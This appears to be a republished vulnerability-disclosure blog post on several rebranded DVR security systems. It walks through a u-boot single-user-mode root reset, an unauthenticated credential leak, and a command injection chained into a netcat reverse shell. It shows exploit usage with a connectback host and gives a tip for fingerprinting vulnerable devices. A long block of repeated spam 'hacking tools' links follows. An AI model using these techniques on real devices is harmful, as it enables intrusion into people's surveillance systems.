Swann Song - DVR Insecurity

"Swan song" is a metaphorical phrase for a final gesture, effort, or performance given just before death or retirement. This post serves as the "swan song" for a whole slew of DVR security systems. With that being said, I will refer to the lyrical master MC Hammer, lets turn this mutha' out.

I recently had a chance to get my hands on a 4 channel DVR system system sold under a handful of company banners (4/8/16 channels) - Swann, Lorex, Night Owl, Zmodo, URMET, kguard security, etc. A few device model numbers are - DVR04B, DVR08B, DVR-16CIF, DVR16B
After firing up the device and putting it on the network I noticed that it was running a telnet server, unfortunately the device does not appear to come configured with an easy/weak login :(. Time to open it up and see whats going on :)

After opening the device up something grabbed my attention right away....

The highlighted header looked like a pretty good possibility for a serial port, time to break out the multi-meter and check. After a couple power cycles, the header was indeed a serial port :)

After hooking up my usb to serial breakout board to the device serial port and guessing at the following serial settings: 115200 8-N-1 , I was stuck looking at a login prompt without a working login or password.

Lucky for me the device startup can be reconfigured using the u-boot environment. The environment variable "bootargs" can be adjusted to boot the linux system into single user mode by appending "single" to the end of the existing settings:

setenv bootargs mem=68M console=ttyAMA0,115200 root=1f01 rootfstype=jffs2 mtdparts=physmap-flash.0:4M(boot),12M(rootfs),14M(app),2M(para) busclk=220000000 single

This change to the bootargs variable is only temporary at this point, if we were to power cycle the device the change would be lost. It is possible to write these changes to the device, but in this case we only want to boot into single user mode once. To boot the device you need to tell the boot loader where the kernel exists in memory, this value can be found in the default environment variable "bootdcmd".

Once the device is booted up in single user mode, the root password can be reset and the device can be rebooted. Telnet now works, but what fun is that when these devices don't normally expose telnet to the internet :). Now for the real fun...looking at the device the default configuration is setup to auto-magically use the power of the dark lord satan (uPnP) to map a few ports on your router (if it supports uPnP). One of the ports that it will expose is for the web (activeX) application and the other is the actual comms channel the device uses (port 9000). The first item I looked at was the web application that is used to view the video streams remotely and configure the device. The first thing that I found with this lovely device is that the comms channel (9000) did not appear to do any authentication on requests made to it...Strike 1. I imagine the activeX application that is used to connect to the device could be patched to just skip the login screen, but that seems like a lot of work, especially when there are much easier ways in. The next thing I saw was a bit shocking...when you access the application user accounts page the device sends the application all the information about the accounts stored on the device. This includes the login and password. In clear text. Strike 2. I created a small PoC in python that will pull the password from a vulnerable device:

python getPass.py 192.168.10.69
[*]Host: 192.168.10.69
[+]Username: admin
[+]Password: 123456

Script can be found here.

After owning the device at the "application" level, I figured it was time to go deeper.

Port 9000 is run by a binary named 'raysharpdvr'. I pulled the binary off the device and started going through it looking for interesting stuff. First thing I noticed was the device was using the "system" call to carry out some actions, after chasing down these calls and not seeing much, the following popped up:

"sprintf" with user input into a "system", that'll do it. Couple problems to overcome with this. First in order to use this vector for command injection you must configure the device to use "ppp" - this will cause the device to go offline and we will not be able to interact with it further :(. We can get around this issue by injecting a call to the dhcp client appliction ("udhcpc") - this will cause the device to use dhcp to get its network information bypassing the previous "ppp" config. The other issue is once we have reconfigured the device to run our command, it needs to be restarted before it will execute (its part of the init scripts). The application does not actually provide a way to reboot the device using the web interface, there is a section that says 'reboot', but when it is triggered nothing happens and some debugging information displayed in the serial console saying the functionality is not implemented. Lucky for us there are plenty of overflow bugs in this device that will lead to a crash :). The device has a watchdog that polls the system to check if the "raysharpdvr" application is running and if it does not see it, it initiates a system reboot - very helpful. With those two issues out of the way the only thing left is HOW to talk to our remote root shell that is waiting for us....luckily the device ships with netcat built into busybox, -e flag and all :)

Usage: sploit.py <target> <connectback host> <connectback port>
$ python sploit.py 192.168.10.69 192.168.10.66 9999
[*]Sending Stage 1
[*]Sending Stage 2
[*]Rebooting the server with crash....
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:9999

Strike 3, get this weak shit off my network. The script can be found here. The script relies on the web application running on port 80, this is not always the case so you may need to adjust the script to fix if your device listens on another port. It is also worth noting that it may take a few minutes for the device to reboot and connect back to you.

Unfortunately the web server that runs on this device does not behave correctly (no response headers) so I do not believe finding these online is as easy as searching shodan, however it is possible to fingerprint vulnerable devices by looking for hosts with port 9000 open.

tl;dr; A whole slew of security dvr devices are vulnerable to an unauthenticated login disclosure and unauthenticated command injection.

Related links

1. New Hacker Tools
2. Hacker Tools 2019
3. Nsa Hacker Tools
4. Tools Used For Hacking
5. Pentest Box Tools Download
6. Hack And Tools
7. Bluetooth Hacking Tools Kali
8. Hacker Tools For Pc
9. Hacking Tools For Windows 7
10. Bluetooth Hacking Tools Kali
11. Pentest Tools Download
12. Hack Apps
13. Pentest Tools Bluekeep
14. Top Pentest Tools
15. Tools 4 Hack
16. Hacker Tools For Mac
17. Hacker Security Tools
18. Computer Hacker
19. Pentest Tools Kali Linux
20. Hack Website Online Tool
21. Hacking Tools 2019
22. What Is Hacking Tools
23. Pentest Tools Port Scanner
24. Hack Tools
25. Hacking Tools Free Download
26. Hacker Tools Mac
27. Hacker Security Tools
28. Beginner Hacker Tools
29. Hacker Tools Windows
30. Github Hacking Tools
31. Hacker Techniques Tools And Incident Handling
32. Hack And Tools
33. Tools Used For Hacking
34. Growth Hacker Tools
35. Pentest Tools For Windows
36. Hacker Tools Free Download
37. Hacker Tools Apk Download
38. Hacker Tools Hardware
39. Pentest Tools List
40. Game Hacking
41. Pentest Tools Subdomain
42. Hackers Toolbox
43. Pentest Tools Windows
44. Pentest Tools Subdomain
45. Hacking Tools Pc
46. How To Install Pentest Tools In Ubuntu
47. Pentest Tools For Ubuntu
48. Hacker Tools Apk Download
49. What Is Hacking Tools
50. Hacker Tools Linux
51. Kik Hack Tools
52. Pentest Tools Website Vulnerability
53. Hacking Apps
54. Pentest Tools Windows
55. Hack Website Online Tool
56. Hacking Tools And Software
57. Hacker Tools Free
58. Hacker Tools Free
59. How To Make Hacking Tools
60. Hack And Tools
61. Pentest Tools Linux
62. Hacking Tools For Kali Linux
63. Hacking Tools Usb
64. Hak5 Tools
65. Pentest Automation Tools
66. Bluetooth Hacking Tools Kali
67. Hack App
68. Hacker Security Tools
69. Game Hacking
70. Nsa Hack Tools Download
71. Best Pentesting Tools 2018
72. Pentest Automation Tools
73. Hack Tools Mac
74. Hacking Tools 2019
75. Pentest Tools Url Fuzzer
76. Hacking Tools For Windows
77. Hack Website Online Tool
78. Hacker Tools Online
79. Hacking Tools For Windows Free Download
80. Hacker
81. Hacker Tools Free
82. Blackhat Hacker Tools
83. Hack Tools Pc
84. Pentest Tools Review
85. Hacking Tools Free Download
86. Pentest Tools Framework
87. Hacker Tools 2020
88. Hacker Tools Hardware
89. Pentest Reporting Tools
90. Free Pentest Tools For Windows
91. Hacking Tools For Windows Free Download
92. How To Install Pentest Tools In Ubuntu
93. Bluetooth Hacking Tools Kali
94. Pentest Tools Free
95. Hacker Techniques Tools And Incident Handling
96. Ethical Hacker Tools
97. Pentest Tools Tcp Port Scanner
98. Hack Tools For Games
99. Hacking Tools For Pc
100. Hacking Tools Online
101. Hacking Apps
102. Hacking Tools Mac
103. Hacking Tools For Windows 7
104. Pentest Tools Kali Linux
105. Pentest Recon Tools
106. Pentest Tools Find Subdomains
107. Hack Tools
108. Hack Tools Download
109. Hack And Tools
110. Hack Tools
111. Hackers Toolbox
112. Hacking Tools Online
113. Hacker Search Tools
114. Hack Tools
115. Usb Pentest Tools
116. Ethical Hacker Tools
117. Hacking Tools Free Download
118. Hacking Tools For Windows Free Download
119. Hack Tools Mac
120. Hak5 Tools
121. Pentest Tools Download
122. Black Hat Hacker Tools
123. Hacker Tools Software
124. Hacking Tools For Mac
125. Hacking Tools Github
126. Pentest Tools Find Subdomains
127. Pentest Tools Github
128. Pentest Tools Download
129. Pentest Box Tools Download
130. Pentest Tools Kali Linux
131. Usb Pentest Tools
132. Hack Tool Apk No Root
133. Pentest Tools Website
134. Hacking Tools Hardware
135. Underground Hacker Sites
136. Hacker Tools Github
137. Pentest Tools For Mac
138. Hacking Tools Github
139. Hacking Tools Download
140. Hack Tool Apk No Root
141. Hacking Tools Pc
142. Top Pentest Tools
143. Hacker Tools Linux
144. Hacking Tools For Windows Free Download
145. Pentest Tools Tcp Port Scanner
146. Kik Hack Tools
147. How To Make Hacking Tools
148. Growth Hacker Tools
149. Nsa Hacker Tools
150. Hacker Tools 2020
151. Hacking Tools Online
152. Hacking Apps
153. Pentest Tools For Android
154. Hack Website Online Tool
155. Hacker Search Tools
156. Hacker Tools For Pc
157. Pentest Tools Port Scanner
158. Best Hacking Tools 2019
159. Hacker Tools For Mac
160. Hacking Tools For Games
161. Hack Tool Apk No Root
162. Hack Tools For Pc